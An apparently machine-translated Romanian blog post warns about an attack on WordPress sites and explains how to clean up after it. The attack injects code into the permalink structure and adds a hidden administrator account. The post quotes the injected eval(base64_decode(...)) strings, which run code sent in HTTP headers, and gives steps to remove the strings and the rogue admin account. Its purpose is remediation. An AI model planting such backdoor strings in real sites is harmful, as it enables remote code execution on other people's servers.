WordPress SQL Injection - ultimul atac
Multe site-uri sunt lovite de un atac SQL recent în care codurile sunt injectate pe site-ul dvs. Această injecție MySQL vă afectează permalinks, făcându-le ineficiente. Ca rezultat, adresele URL de postări de bloguri nu vor funcționa. Numeroase bloguri WordPress au fost vizate în acest atac, datorită lui Andy Soward că ne-a atras atenția.
Există unul dintre următoarele coduri care au fost adăugate la structura permalink din cauza acestui atac:
% & ($ Eval (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%
„/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Aceste citate adăugă toate permalinks de pe site-ul dvs. și pot fi modificate numai dacă sunt eliminate manual.
Pentru a rezolva acest lucru du-te la:
Settings (Setări)> Permalinks și eliminați codul de mai sus și înlocuiți codul implicit.
Următorul lucru pe care trebuie să-l faceți este să mergeți la utilizatori. Veți vedea că există mai mulți administratori. Nu veți vedea numele lor enumerate, dar veți vedea numărul crescut. Deci, ceea ce trebuie să faceți este să vă uitați la toți utilizatorii și să găsiți ultimul care sa înregistrat. Puneți mouse-ul peste acel utilizator și obțineți linkul. Modificați codul userid = adăugând 1 la numărul respectiv. Deci, dacă ultimul utilizator pe care îl vedeți a fost utilizatorul # 2, apoi adăugați 1 la acesta și faceți-l 3. Ar trebui să găsiți că administratorul ascuns are un cod ciudat ca un prim nume. Ștergeți codul și îl transformați într-un abonat. Apoi îl întoarceți și îl ștergeți.
Acest lucru ar trebui să remedieze problema. De asemenea, îl puteți șterge pur și simplu mergând la PHPMyAdmin. Pentru că veți vedea utilizatorul acolo.
Am vrut doar să obținem aceste știri cât mai curând posibil, astfel încât utilizatorii noștri să poată fi actualizați. Asigurați-vă că verificați dacă blogul dvs. nu este infectat. Speram ca WordPress sa iasa cu o lansare in curand.
De asemenea, dacă nu ați implementat unele dintre aceste măsuri pentru a vă asigura zona de administrare WordPress.